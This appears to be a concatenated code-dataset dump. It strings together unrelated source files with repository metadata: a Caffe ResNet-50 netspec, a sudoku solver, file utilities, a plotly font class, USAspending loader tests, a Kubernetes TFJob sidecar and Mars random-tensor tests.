names: if (name == '5a'): net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train) else: net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train) pre_out = out net['pool5'+post] = ave_pool(net[final], 7, 1) final = 'pool5'+post return net, final # main netspec wrapper def res50_train(mean_value, list_file, is_train=True): # setup the python data layer net = caffe.NetSpec() net.data, net.label \ = L.ReidData(transform_param=dict(mirror=True,crop_size=224,mean_value=mean_value), reid_data_param=dict(source=list_file,batch_size=16,new_height=256,new_width=256, pos_fraction=1,neg_fraction=1,pos_limit=1,neg_limit=4,pos_factor=1,neg_factor=1.01), ntop = 2) net, final = res50_body(net, 'data', '', is_train) net['score'] = fc_relu(net[final], nout=751, is_train=is_train, has_relu=False) net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2) net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=is_train, has_relu=False) net['loss'] = L.SoftmaxWithLoss(net['score'], net['label'] , propagate_down=[1,0], loss_weight=1) net['loss_dif'] = L.SoftmaxWithLoss(net['score_dif'], net['label_dif'], propagate_down=[1,0], loss_weight=0.5) return str(net.to_proto()) def res50_dev(data_param = dict(shape=dict(dim=[2, 3, 224, 224])), label_param = dict(shape=dict(dim=[2]))): # setup the python data layer net = caffe.NetSpec() net['data'] = L.Input(input_param = data_param) net['label'] = L.Input(input_param = label_param) net, final = res50_body(net, 'data', '', is_train=False) net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False) net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2) net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=False, has_relu=False) return str(net.to_proto()) def res50_score(input_param = dict(shape=dict(dim=[1, 3, 224, 224]))): # setup the python data layer net = caffe.NetSpec() net['data'] = L.Input(input_param = input_param) net, final = res50_body(net, 'data', '', is_train=False) net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False) net['prediction'] = L.Softmax(net['score']) return str(net.to_proto()) workdir = osp.join(osp.dirname(__file__), 'res50') if not os.path.isdir(workdir): os.makedirs(workdir) logdir = osp.join(workdir, 'log') if not os.path.isdir(logdir): os.makedirs(logdir) snapshotdir = osp.join(workdir, 'snapshot') if not os.path.isdir(snapshotdir): os.makedirs(snapshotdir) print('Work Dir : {}'.format(workdir)) train_proto = osp.join(workdir, "train.proto") solverproto = tools.CaffeSolver(trainnet_prototxt_path = train_proto, testnet_prototxt_path = None) solverproto.sp['display'] = "100" solverproto.sp['base_lr'] = "0.001" solverproto.sp['stepsize'] = "16000" solverproto.sp['max_iter'] = "18000" solverproto.sp['snapshot'] = "1000" solverproto.sp['iter_size'] = "4" solverproto.sp['snapshot_prefix'] = "\"{}/snapshot/res50.full\"".format(workdir) solverproto.write(osp.join(workdir, 'solver.proto')) list_file = 'examples/market1501/lists/train.lst' mean_value = [97.8286, 99.0468, 105.606] # write train net. with open(train_proto, 'w') as f: f.write(res50_train(mean_value, list_file, True)) dev_proto = osp.join(workdir, "dev.proto") with open(dev_proto, 'w') as f: f.write(res50_score()) dep_proto = osp.join(workdir, "deploy.proto") with open(dep_proto, 'w') as f: f.write(res50_dev())
44.071856
153
0.670516
5afe4acc19c3deff0621391e914c850fd9d6e5e9
4,126
py
Python
leetcode/python/sudokuSolver.py
yaoxuanw007/forfun
db50bd40852d49bd68bae03ceb43cb4a901c6d37
[ "MIT" ]
null
null
null
leetcode/python/sudokuSolver.py
yaoxuanw007/forfun
db50bd40852d49bd68bae03ceb43cb4a901c6d37
[ "MIT" ]
null
null
null
leetcode/python/sudokuSolver.py
yaoxuanw007/forfun
db50bd40852d49bd68bae03ceb43cb4a901c6d37
[ "MIT" ]
null
null
null
# https://oj.leetcode.com/problems/sudoku-solver/ class Solution: # @param board, a 9x9 2D array # Solve the Sudoku by modifying the input board in-place. # Do not return any value. def solveSudoku(self, board): if len(board) == 0 or len(board[0]) == 0: return m, n = len(board), len(board[0]) for i in xrange(m): board[i] = [x for x in board[i]] self.solve(board, m, n) for i in xrange(m): board[i] = ''.join(board[i]) def solve(self, board, m, n): for i in xrange(m): for j in xrange(n): if board[i][j] == '.': for k in xrange(1, 10): board[i][j] = str(k) if self.isValid(board, i, j) and self.solve(board, m, n): return True board[i][j] = '.' return False return True def isValid(self, board, x, y): # 1*9 flags = [False] * 9 for i in xrange(9): if board[x][i] != '.': num = int(board[x][i]) - 1 if flags[num]: return False flags[num] = True # 9*1 flags = [False] * 9 for i in xrange(9): if board[i][y] != '.': num = int(board[i][y]) - 1 if flags[num]: return False flags[num] = True # 3*3 flags = [False] * 9 r, c = x/3, y/3 for i in xrange(3): for j in xrange(3): if board[r*3+i][c*3+j] != '.': num = int(board[r*3+i][c*3+j]) - 1 if flags[num]: return False flags[num] = True return True import pprint as pp # Pass OJ !! class Solution1: # @param board, a 9x9 2D array # Solve the Sudoku by modifying the input board in-place. # Do not return any value. def solveSudoku(self, board): if len(board) == 0 or len(board[0]) == 0: return m, n = len(board), len(board[0]) for i in xrange(m): board[i] = [x for x in board[i]] self.createBoardAvail(board, m, n) self.solve(board, m, n) for i in xrange(m): board[i] = ''.join(board[i]) def createBoardAvail(self, board, m, n): self.boardAvail = [[None]*n for i in xrange(m)] for x in xrange(m): for y in xrange(n): self.boardAvail[x][y] = set([str(k) for k in range(1,10)]) for x in xrange(m): for y in xrange(n): self.removeBoardAvail(board, x, y) # pp.pprint(self.boardAvail) def removeBoardAvail(self, board, x, y, boardDelta=None): if board[x][y] != '.': for i in xrange(9): if board[x][y] in self.boardAvail[i][y]: if boardDelta: boardDelta[i][y] = True self.boardAvail[i][y].remove(board[x][y]) for i in xrange(9): if board[x][y] in self.boardAvail[x][i]: if boardDelta: boardDelta[x][i] = True self.boardAvail[x][i].remove(board[x][y]) r, c = x//3, y//3 for i in xrange(3): for j in xrange(3): if board[x][y] in self.boardAvail[r*3+i][c*3+j]: if boardDelta: boardDelta[r*3+i][c*3+j] = True self.boardAvail[r*3+i][c*3+j].remove(board[x][y]) def addBoardAvail(self, board, x, y, boardDelta): if board[x][y] != '.': for i in xrange(9): for j in xrange(9): if boardDelta[i][j]: boardDelta[i][j] = False self.boardAvail[i][j].add(board[x][y]) def solve(self, board, m, n): for x in xrange(m): for y in xrange(n): if board[x][y] == '.': boardDelta = [[False]*n for i in xrange(m)] for num in [str(n) for n in xrange(1, 10)]: if num in self.boardAvail[x][y]: board[x][y] = num self.removeBoardAvail(board, x, y, boardDelta) # pp.pprint([board, self.boardAvail]) if self.solve(board, m, n): return True self.addBoardAvail(board, x, y, boardDelta) board[x][y] = '.' return False return True # Test s = Solution1() board = [".87654329","2........","3........","4........","5........","6........","7........","8........","9........"] s.solveSudoku(board) print board
29.683453
117
0.509937
b70863d7f362b687c4a64a93c1d8949441eff751
3,039
py
Python
rltorch/utils/file_utils.py
Jjschwartz/rltorch
eeb2ad955f018d768db98c4a2be5da96a75579f6
[ "MIT" ]
null
null
null
rltorch/utils/file_utils.py
Jjschwartz/rltorch
eeb2ad955f018d768db98c4a2be5da96a75579f6
[ "MIT" ]
null
null
null
rltorch/utils/file_utils.py
Jjschwartz/rltorch
eeb2ad955f018d768db98c4a2be5da96a75579f6
[ "MIT" ]
null
null
null
"""This module contains general file handling functions, common to multiple packages. """ import os import yaml import shutil import pathlib import tempfile import os.path as osp def load_yaml(file_path): """Load yaml file located at file path, throws error if theres an issue loading file. """ with open(file_path) as fin: content = yaml.load(fin, Loader=yaml.FullLoader) return content def write_yaml(file_path, data): """Write a dictionary to yaml file """ with open(file_path, "w") as fout: yaml.dump(data, fout) def get_file_name(file_path): """Extracts the file or directory name from a file path, removing extension. """ full_file_name = file_path.split(os.sep)[-1] file_name = full_file_name.split(".")[0] return file_name def get_dir_name(path): """Get the name of top level directory in path. """ if osp.isfile(path): return osp.basename(osp.dirname(path)) return osp.basename(osp.abspath(path)) def get_parent_dir_path(path): """Returns the path to the parent directory in path. """ if osp.isfile(path): return osp.dirname(path) return osp.dirname(osp.abspath(path)) def make_dir(dir_path, msg=None): """Makes a new directory at given path, or prints warning if one already exists. """ if osp.exists(dir_path): if msg is None: print(f"WARNING: dir {dir_path} already exists.") else: print(f"WARNING: {msg}") pathlib.Path(dir_path).mkdir(exist_ok=True) def setup_sub_dir(parent_dir, sub_dir): """Setup save directory for single episode trace """ new_dir = osp.join(parent_dir, sub_dir) make_dir(new_dir, f"sub dir already exists, storing there any way") return new_dir def generate_file_path(parent_dir, file_name, extension): """Generates a full file path from a parent directory, file name and file extension. """ if extension[0] != ".": extension = "." + extension return osp.join(parent_dir, file_name + extension) def replace_extension(file_path, extension): """Generate a new file path from existing file path and new extension """ split_path = file_path.rsplit(".", 1) return ".".join([split_path[0], extension]) def get_all_files_from_dir(dir, extension=None): """Returns full file paths of all files in directory with optional filtering by file extension. """ file_list = os.listdir(dir) files = [] for file_name in file_list: if extension is None or extension in file_name: files.append(osp.join(dir, file_name)) return files def get_tmp_file(suffix=None): """Returns full path to a temporary file. Suffix is optional file ending (e.g. .txt). Must include '.' if required. """ with tempfile.NamedTemporaryFile(suffix=suffix) as temp_file: return temp_file.name def move_dirs_into_parent_dir(dir_paths, parent_dir): make_dir(parent_dir) for d in dir_paths: shutil.move(d, parent_dir)
28.138889
77
0.679171
7f34b6324813a0e3e136adf01ab4f615d4141d37
5,045
py
Python
env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py
acrucetta/Chicago_COVI_WebApp
a37c9f492a20dcd625f8647067394617988de913
[ "MIT", "Unlicense" ]
11,750
2015-10-12T07:03:39.000Z
2022-03-31T20:43:15.000Z
env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py
acrucetta/Chicago_COVI_WebApp
a37c9f492a20dcd625f8647067394617988de913
[ "MIT", "Unlicense" ]
2,951
2015-10-12T00:41:25.000Z
2022-03-31T22:19:26.000Z
env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py
acrucetta/Chicago_COVI_WebApp
a37c9f492a20dcd625f8647067394617988de913
[ "MIT", "Unlicense" ]
2,623
2015-10-15T14:40:27.000Z
2022-03-28T16:05:50.000Z
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType import copy as _copy class Textfont(_BaseTraceHierarchyType): # class properties # -------------------- _parent_path_str = "scattergl.selected" _path_str = "scattergl.selected.textfont" _valid_props = {"color"} # color # ----- @property def color(self): """ Sets the text font color of selected points. The 'color' property is a color and may be specified as: - A hex string (e.g. '#ff0000') - An rgb/rgba string (e.g. 'rgb(255,0,0)') - An hsl/hsla string (e.g. 'hsl(0,100%,50%)') - An hsv/hsva string (e.g. 'hsv(0,100%,100%)') - A named CSS color: aliceblue, antiquewhite, aqua, aquamarine, azure, beige, bisque, black, blanchedalmond, blue, blueviolet, brown, burlywood, cadetblue, chartreuse, chocolate, coral, cornflowerblue, cornsilk, crimson, cyan, darkblue, darkcyan, darkgoldenrod, darkgray, darkgrey, darkgreen, darkkhaki, darkmagenta, darkolivegreen, darkorange, darkorchid, darkred, darksalmon, darkseagreen, darkslateblue, darkslategray, darkslategrey, darkturquoise, darkviolet, deeppink, deepskyblue, dimgray, dimgrey, dodgerblue, firebrick, floralwhite, forestgreen, fuchsia, gainsboro, ghostwhite, gold, goldenrod, gray, grey, green, greenyellow, honeydew, hotpink, indianred, indigo, ivory, khaki, lavender, lavenderblush, lawngreen, lemonchiffon, lightblue, lightcoral, lightcyan, lightgoldenrodyellow, lightgray, lightgrey, lightgreen, lightpink, lightsalmon, lightseagreen, lightskyblue, lightslategray, lightslategrey, lightsteelblue, lightyellow, lime, limegreen, linen, magenta, maroon, mediumaquamarine, mediumblue, mediumorchid, mediumpurple, mediumseagreen, mediumslateblue, mediumspringgreen, mediumturquoise, mediumvioletred, midnightblue, mintcream, mistyrose, moccasin, navajowhite, navy, oldlace, olive, olivedrab, orange, orangered, orchid, palegoldenrod, palegreen, paleturquoise, palevioletred, papayawhip, peachpuff, peru, pink, plum, powderblue, purple, red, rosybrown, royalblue, rebeccapurple, saddlebrown, salmon, sandybrown, seagreen, seashell, sienna, silver, skyblue, slateblue, slategray, slategrey, snow, springgreen, steelblue, tan, teal, thistle, tomato, turquoise, violet, wheat, white, whitesmoke, yellow, yellowgreen Returns ------- str """ return self["color"] @color.setter def color(self, val): self["color"] = val # Self properties description # --------------------------- @property def _prop_descriptions(self): return """\ color Sets the text font color of selected points. """ def __init__(self, arg=None, color=None, **kwargs): """ Construct a new Textfont object Parameters ---------- arg dict of properties compatible with this constructor or an instance of :class:`plotly.graph_objs.scattergl.selected.Textfont` color Sets the text font color of selected points. Returns ------- Textfont """ super(Textfont, self).__init__("textfont") if "_parent" in kwargs: self._parent = kwargs["_parent"] return # Validate arg # ------------ if arg is None: arg = {} elif isinstance(arg, self.__class__): arg = arg.to_plotly_json() elif isinstance(arg, dict): arg = _copy.copy(arg) else: raise ValueError( """\ The first argument to the plotly.graph_objs.scattergl.selected.Textfont constructor must be a dict or an instance of :class:`plotly.graph_objs.scattergl.selected.Textfont`""" ) # Handle skip_invalid # ------------------- self._skip_invalid = kwargs.pop("skip_invalid", False) self._validate = kwargs.pop("_validate", True) # Populate data dict with properties # ---------------------------------- _v = arg.pop("color", None) _v = color if color is not None else _v if _v is not None: self["color"] = _v # Process unknown kwargs # ---------------------- self._process_kwargs(**dict(arg, **kwargs)) # Reset skip_invalid # ------------------ self._skip_invalid = False
36.294964
82
0.557185
71de53558c42e2ff9effe10bcb500ec533beb54c
10,487
py
Python
usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
1
2021-11-15T17:54:12.000Z
2021-11-15T17:54:12.000Z
usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
# Stdlib imports # Core Django imports from django.core.management import call_command # Third-party app imports import pytest from unittest.mock import MagicMock from model_mommy import mommy # Imports from your apps from usaspending_api.awards.models import Award, Subaward, TransactionNormalized from usaspending_api.references.models import Agency, SubtierAgency from usaspending_api.recipient.models import RecipientLookup DB_CURSOR_PARAMS = { 'default': MagicMock(), 'data_broker': MagicMock(), 'data_broker_data_file': 'usaspending_api/broker/tests/data/broker_subawards.json' } @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_fresh_subaward_load_no_associated_awards(mock_db_cursor): """ Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to """ mommy.make(RecipientLookup, duns='PARENTDUNS54321', legal_business_name='WIZARD SCHOOLS') call_command('load_fsrs') expected_results = { 'count': 3, 'awards': [None, None, None], 'recipient_names': ["JJ'S DINER", 'HARRY POTTER', 'HARRY POTTER'], 'ppop_city_names': ['PAWNEE', '', ''], 'subaward_descs': ['RANDOM DESCRIPTION TEXT', 'HOGWARTS ACCEPTANCE LETTER', 'HOGWARTS ACCEPTANCE LETTER REVISED'], 'duns': ['DUNS12345', 'DUNS54321', 'DUNS54321'], 'dba_names': ["JJ'S", "HOGWARTS", "HOGWARTS"], 'parent_recipient_names': ["PARENT JJ'S DINER", "WIZARD SCHOOLS", "WIZARD SCHOOLS"], 'broker_award_ids': [10, 20, 30], 'internal_ids': ['PROCUREMENT_INTERNAL_ID', 'GRANT_INTERNAL_ID_1', 'GRANT_INTERNAL_ID_2'], } actual_results = { 'count': Subaward.objects.count(), 'awards': list(Subaward.objects.values_list('award', flat=True)), 'recipient_names': list(Subaward.objects.values_list('recipient_name', flat=True)), 'ppop_city_names': list(Subaward.objects.values_list('pop_city_name', flat=True)), 'subaward_descs': list(Subaward.objects.values_list('description', flat=True)), 'duns': list(Subaward.objects.values_list('recipient_unique_id', flat=True)), 'dba_names': list(Subaward.objects.values_list('dba_name', flat=True)), 'parent_recipient_names': list(Subaward.objects.values_list('parent_recipient_name', flat=True)), 'broker_award_ids': list(Subaward.objects.values_list('broker_award_id', flat=True)), 'internal_ids': list(Subaward.objects.values_list('internal_id', flat=True)), } assert expected_results == actual_results @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_fresh_subaward_load_associated_awards_exact_match(mock_db_cursor): """ Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to """ # "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id # "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number models_to_mock = [ { 'model': Award, 'id': 50, 'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': Award, 'id': 100, 'fain': 'FAIN54321', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': SubtierAgency, 'subtier_agency_id': 1, 'subtier_code': '12345' }, { 'model': Agency, 'subtier_agency_id': 1 } ] for entry in models_to_mock: mommy.make(entry.pop('model'), **entry) call_command('load_fsrs') expected_results = { 'count': 3, 'award_ids': [50, 100, 100] } actual_results = { 'count': Subaward.objects.count(), 'award_ids': list(Subaward.objects.values_list('award_id', flat=True)) } assert expected_results == actual_results @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_fresh_subaward_load_associated_awards_with_dashes(mock_db_cursor): """ Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to """ # "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id # "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number models_to_mock = [ { 'model': Award, 'id': 50, 'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': Award, 'id': 100, 'fain': 'FAIN-54321', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': SubtierAgency, 'subtier_agency_id': 1, 'subtier_code': '12345' }, { 'model': Agency, 'subtier_agency_id': 1 } ] for entry in models_to_mock: mommy.make(entry.pop('model'), **entry) call_command('load_fsrs') expected_results = { 'count': 3, 'award_ids': [50, 100, 100] } actual_results = { 'count': Subaward.objects.count(), 'award_ids': list(Subaward.objects.values_list('award_id', flat=True)) } assert expected_results == actual_results @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_fresh_subaward_load_associated_awards_multiple_matching_fains(mock_db_cursor): """ Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to """ # "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id # "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number models_to_mock = [ { 'model': Award, 'id': 50, 'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': Award, 'id': 99, 'fain': 'FAIN54321', 'date_signed': '1700-01-02', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': Award, 'id': 100, 'fain': 'FAIN-54321', 'date_signed': '1700-01-01', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': SubtierAgency, 'subtier_agency_id': 1, 'subtier_code': '12345' }, { 'model': Agency, 'subtier_agency_id': 1 } ] for entry in models_to_mock: mommy.make(entry.pop('model'), **entry) call_command('load_fsrs') expected_results = { 'count': 3, 'award_ids': [50, 99, 99] } actual_results = { 'count': Subaward.objects.count(), 'award_ids': list(Subaward.objects.values_list('award_id', flat=True)) } assert expected_results == actual_results @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_subaward_update(mock_db_cursor): """ Test the subaward load as if a subaward is already in there with the same internal id, delete/update it """ models_to_mock = [ { 'model': Award, 'id': 99, 'fain': 'FAIN54321', 'date_signed': '1700-01-03', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': SubtierAgency, 'subtier_agency_id': 1, 'subtier_code': '12345' }, { 'model': Agency, 'subtier_agency_id': 1 }, { 'id': 5, 'model': Subaward, 'subaward_number': 'SUBNUM54322', 'internal_id': 'GRANT_INTERNAL_ID_1', 'broker_award_id': 1, 'award_type': 'grant', 'award_id': 99, 'amount': 2, 'action_date': '2014-01-01' }, ] for entry in models_to_mock: mommy.make(entry.pop('model'), **entry) call_command('load_fsrs') expected_results = { 'subaward_number': 'SUBNUM54321', 'amount': 54321, 'action_date': '1212-12-12' } actual_results = Subaward.objects.filter(internal_id='GRANT_INTERNAL_ID_1').values(*expected_results)[0] actual_results['action_date'] = str(actual_results['action_date']) assert expected_results == actual_results @pytest.mark.django_db @pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True) def test_subaward_broken_links(mock_db_cursor): """ Test the subaward load as if a subaward has been loaded w/o a parent award and now the parent award is available """ models_to_mock = [ { 'model': Award, 'id': 99, 'fain': 'FAIN54321', 'date_signed': '1700-01-03', 'latest_transaction': mommy.make(TransactionNormalized) }, { 'model': SubtierAgency, 'subtier_agency_id': 1, 'subtier_code': '12345' }, { 'model': Agency, 'subtier_agency_id': 1 }, { 'id': 5, 'model': Subaward, 'subaward_number': 'SUBNUM54322', 'internal_id': 'GRANT_INTERNAL_ID_1', 'broker_award_id': 100, 'award_type': 'grant', 'award_id': None, 'amount': 2, 'action_date': '2014-01-01' }, ] for entry in models_to_mock: mommy.make(entry.pop('model'), **entry) call_command('load_fsrs') expected_results = { 'award_id': 99, } actual_results = Subaward.objects.filter(id=5).values(*expected_results)[0] assert expected_results == actual_results
31.778788
116
0.610089
ba66a14c1c6f88c6164494a5ee094ce9e5a478f6
3,115
py
Python
applications/ps-sidecar/main.py
awesome-archive/nauta
6ba6103421a10dfcd051aef3f7c5a714f6ac9429
[ "Apache-2.0" ]
null
null
null
applications/ps-sidecar/main.py
awesome-archive/nauta
6ba6103421a10dfcd051aef3f7c5a714f6ac9429
[ "Apache-2.0" ]
14
2020-09-26T01:27:23.000Z
2022-02-10T02:14:54.000Z
applications/ps-sidecar/main.py
awesome-archive/nauta
6ba6103421a10dfcd051aef3f7c5a714f6ac9429
[ "Apache-2.0" ]
null
null
null
# # Copyright (c) 2019 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import logging as log from os import getenv from sys import exit from time import sleep from kubernetes import client, config from kubernetes.client import V1Pod, V1ObjectMeta JOB_SUCCESS_CONDITION = "Succeeded" LOGGING_LEVEL_MAPPING = {"DEBUG": log.DEBUG, "INFO": log.INFO, "WARNING": log.WARNING, "ERROR": log.ERROR, "CRITICAL": log.CRITICAL} logging_level_str = getenv("LOGGING_LEVEL") if logging_level_str is None: raise RuntimeError("LOGGING_LEVEL env var is not defined!") if logging_level_str not in LOGGING_LEVEL_MAPPING.keys(): raise RuntimeError("LOGGING_LEVEL env var must be set to one out of {}. Current value: {}" .format(LOGGING_LEVEL_MAPPING.keys(), logging_level_str)) log.basicConfig(level=logging_level_str) log.critical("Ps sidecar log level set to: " + logging_level_str) config.load_incluster_config() my_pod_name = getenv("MY_POD_NAME") if my_pod_name is None: raise RuntimeError("MY_POD_NAME env var is not defined!") with open("/var/run/secrets/kubernetes.io/serviceaccount/namespace", mode='r') as file: my_current_namespace = file.read() if not my_current_namespace: raise RuntimeError(f"error reading my current namespace {str(my_current_namespace)}") v1 = client.CoreV1Api() my_pod: V1Pod = v1.read_namespaced_pod(name=my_pod_name, namespace=my_current_namespace) my_pod_metadata: V1ObjectMeta = my_pod.metadata try: my_tfjob_name = my_pod_metadata.owner_references[0].name except IndexError: raise RuntimeError("couldn't read my pod tf_job_key - no owner reference!") if my_tfjob_name is None or my_tfjob_name == "": raise RuntimeError("my_tfjob_name is not defined!") coAPI = client.CustomObjectsApi() log.info("initialization succeeded") while True: log.info(f"fetching tfjob: {my_tfjob_name} ...") my_tfjob = coAPI.get_namespaced_custom_object(group="kubeflow.org", version="v1alpha2", namespace=my_current_namespace, plural="tfjobs", name=my_tfjob_name) job_conditions = my_tfjob["status"]["conditions"] for condition in job_conditions: if condition.get("type") == JOB_SUCCESS_CONDITION: log.info("Job succeeded, creating END hook") open("/pod-data/END", 'a').close() log.info("exiting...") exit(0) sleep(1)
33.138298
106
0.686998
a690c38c0d2fac4fa6dff75ea8eb73b1adb90108
155
py
Python
python/testData/skeletons/BinaryStandardModule.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2018-12-29T09:53:39.000Z
2018-12-29T09:53:42.000Z
python/testData/skeletons/BinaryStandardModule.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/skeletons/BinaryStandardModule.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
import binascii import datetime import <error descr="No module named nonexistent">nonexistent</error> print(binascii) print(datetime) print(nonexistent)
17.222222
69
0.812903
842258234e0190fd4f026476b288e6d41f383ed1
239
py
Python
ptrlib/util/__init__.py
alissonbezerra/ptrlib
67a557acfa5069a66dd26670f53d94e63b023642
[ "MIT" ]
57
2019-12-08T00:02:14.000Z
2022-03-24T20:40:40.000Z
ptrlib/util/__init__.py
alissonbezerra/ptrlib
67a557acfa5069a66dd26670f53d94e63b023642
[ "MIT" ]
3
2020-01-26T03:38:31.000Z
2020-06-21T13:42:46.000Z
ptrlib/util/__init__.py
alissonbezerra/ptrlib
67a557acfa5069a66dd26670f53d94e63b023642
[ "MIT" ]
8
2020-04-20T08:17:57.000Z
2021-10-04T06:04:51.000Z
from ptrlib.util.encoding import * from ptrlib.util.packing import * from ptrlib.util.logic import * from ptrlib.util.construct import * from ptrlib.util.opebinary import * from ptrlib.util.misc import * from ptrlib.util.brutepwn import *
29.875
35
0.794979
77a84e501386cfba40c2c4443f895194e2e3f5ea
6,725
py
Python
mars/tensor/random/tests/test_random.py
tomzhang/mars-1
6f1d85e37eb1b383251314cb0ba13e06288af03d
[ "Apache-2.0" ]
2
2019-03-29T04:11:10.000Z
2020-07-08T10:19:54.000Z
mars/tensor/random/tests/test_random.py
tomzhang/mars-1
6f1d85e37eb1b383251314cb0ba13e06288af03d
[ "Apache-2.0" ]
null
null
null
mars/tensor/random/tests/test_random.py
tomzhang/mars-1
6f1d85e37eb1b383251314cb0ba13e06288af03d
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 1999-2020 Alibaba Group Holding Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np from mars.tensor.random import RandomState, beta, rand, choice, multivariate_normal, \ randint, randn, permutation, TensorPermutation, shuffle from mars.tensor.datasource import tensor as from_ndarray from mars.tests.core import TestBase from mars.tiles import get_tiled class Test(TestBase): def testRandomSerialize(self): arr = RandomState(0).beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2), chunk_size=1, size=(3, 2, 2)).tiles() chunk = arr.chunks[0] self.assertEqual(chunk.op.dtype, np.dtype('f8')) serials = self._pb_serial(chunk) chunk2 = self._pb_deserial(serials)[chunk.data] self.assertEqual(chunk.index, chunk2.index) self.assertEqual(chunk.op.state, chunk2.op.state) self.assertEqual(chunk.op.seed, chunk2.op.seed) def testRandom(self): arr = rand(2, 3) self.assertIsNotNone(arr.dtype) arr = beta(1, 2, chunk_size=2).tiles() self.assertEqual(arr.shape, ()) self.assertEqual(len(arr.chunks), 1) self.assertEqual(arr.chunks[0].shape, ()) self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8')) arr = beta([1, 2], [3, 4], chunk_size=2).tiles() self.assertEqual(arr.shape, (2,)) self.assertEqual(len(arr.chunks), 1) self.assertEqual(arr.chunks[0].shape, (2,)) self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8')) arr = beta([[2, 3]], from_ndarray([[4, 6], [5, 2]], chunk_size=2), chunk_size=1, size=(3, 2, 2)).tiles() self.assertEqual(arr.shape, (3, 2, 2)) self.assertEqual(len(arr.chunks), 12) self.assertEqual(arr.chunks[0].op.dtype, np.dtype('f8')) def testChoice(self): t = choice(5, chunk_size=1) self.assertEqual(t.shape, ()) t = t.tiles() self.assertEqual(t.nsplits, ()) self.assertEqual(len(t.chunks), 1) t = choice(5, 3, chunk_size=1) self.assertEqual(t.shape, (3,)) t = t.tiles() self.assertEqual(t.nsplits, ((1, 1, 1),)) t = choice(5, 3, replace=False) self.assertEqual(t.shape, (3,)) with self.assertRaises(ValueError): choice(-1) # a should be 1-d with self.assertRaises(ValueError): choice(np.random.rand(2, 2)) # p sum != 1 with 